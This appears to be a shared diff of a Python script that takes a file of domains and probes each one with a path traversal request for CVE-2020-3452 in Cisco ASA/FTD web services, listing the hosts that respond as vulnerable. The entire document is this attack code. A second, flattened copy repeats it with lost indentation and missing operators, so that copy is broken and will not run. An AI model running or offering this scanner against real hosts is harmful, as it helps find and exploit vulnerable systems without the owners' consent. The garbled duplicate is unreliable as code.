amustaque97 · August 10, 2020 13:30
diff --git a/script.py b/script.py
 import threading
 import os
 import sys
 import requests
 from requests.adapters import HTTPAdapter
 from requests.packages.urllib3.util.retry import Retry

 # disable requests warning
 requests.packages.urllib3.disable_warnings()

 retry_strategy = Retry(
    total=2,
    status_forcelist=[429, 500, 502, 503, 504],
    method_whitelist=["HEAD", "GET", "OPTIONS"]
 )
 adapter = HTTPAdapter(max_retries=retry_strategy)
 http = requests.Session()
 http.mount("https://", adapter)
 http.mount("http://", adapter)

 URL = "https://{0}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
 VULNERABLE_DOMAINS = []

 def check_cisco_file(domain=None):
    print("[*] %s" % threading.current_thread().getName())

    if not domain:
        print("No domain found!")
        return sys.exit(255)

    # if domain is passed to this function
    try:
        req_obj = http.get(URL.format(domain), verify=False, timeout=5)   
    except:
        print("[x] There is some error while testing domain %s" % domain)
        return

    
    if 199 < req_obj.status_code < 400:
        print("[*] Found something! Checking further...")

        response_text = req_obj.text.lower()
        if "cisco" in response_text or "function" in response_text:
            print("==> %s is vulnerable to CVE-2020-3452" % domain)
            VULNERABLE_DOMAINS.append(domain)




 if __name__ == '__main__':
    file_name = sys.argv[1]
    # total_threads = sys.argv[2]

    file_obj = open(file_name, 'r')
    content = file_obj.readlines()
    content = [x.replace("\n", "") for x in content]
    print("Content of the file")
    print(content)

    for domain in content:
        t = threading.Thread(name="Testing domain: %s" % domain, target=check_cisco_file, args=(domain,))
        t.start()
        t.join()
        pass

    print("\n\n\n" + "-="*10 + "PRINTING ALL VULNERABLE DOMAINS" + "=-"*10)
    # print all the vulnerable domains
    for domain in VULNERABLE_DOMAINS:
        print(domain)
	import threading
	import os
	import sys
	import requests
	from requests.adapters import HTTPAdapter
	from requests.packages.urllib3.util.retry import Retry

	# disable requests warning
	requests.packages.urllib3.disable_warnings()

	retry_strategy = Retry(
	total=2,
	status_forcelist=[429, 500, 502, 503, 504],
	method_whitelist=["HEAD", "GET", "OPTIONS"]
	)
	adapter = HTTPAdapter(max_retries=retry_strategy)
	http = requests.Session()
	http.mount("https://", adapter)
	http.mount("http://", adapter)

	URL = "https://{0}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
	VULNERABLE_DOMAINS = []

	def check_cisco_file(domain=None):
	print("[*] %s" % threading.current_thread().getName())

	if not domain:
	print("No domain found!")
	return sys.exit(255)

	# if domain is passed to this function
	try:
	req_obj = http.get(URL.format(domain), verify=False, timeout=5)
	except:
	print("[x] There is some error while testing domain %s" % domain)
	return


	if 199 < req_obj.status_code < 400:
	print("[*] Found something! Checking further...")

	response_text = req_obj.text.lower()
	if "cisco" in response_text or "function" in response_text:
	print("==> %s is vulnerable to CVE-2020-3452" % domain)
	VULNERABLE_DOMAINS.append(domain)




	if __name__ == '__main__':
	file_name = sys.argv[1]
	# total_threads = sys.argv[2]

	file_obj = open(file_name, 'r')
	content = file_obj.readlines()
	content = [x.replace("\n", "") for x in content]
	print("Content of the file")
	print(content)

	for domain in content:
	t = threading.Thread(name="Testing domain: %s" % domain, target=check_cisco_file, args=(domain,))
	t.start()
	t.join()
	pass

	print("\n\n\n" + "-="10 + "PRINTING ALL VULNERABLE DOMAINS" + "=-"10)
	# print all the vulnerable domains
	for domain in VULNERABLE_DOMAINS:
	print(domain)